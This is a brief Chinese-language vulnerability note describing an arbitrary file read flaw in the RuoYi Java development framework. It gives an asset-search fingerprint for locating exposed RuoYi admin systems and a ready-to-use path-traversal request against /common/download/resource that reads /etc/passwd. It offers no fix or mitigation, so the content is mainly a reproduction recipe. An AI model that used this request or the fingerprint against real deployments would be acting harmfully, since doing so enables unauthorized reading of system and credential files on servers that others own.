若依快速开发框架resource存在任意文件读取漏洞
一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架,采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计,代码清晰简单易于维护,同时提供多种组件,如代码生成、前后端分离、数据权限管理等,可以快速开发出完整的项目。若依快速开发框架存在任意文件读取漏洞
二、影响版本
- ruoyi
三、资产测绘
app="若依-管理系统"
四、漏洞复现
/common/download/resource?resource=/profile/../../../../../../../etc/passwd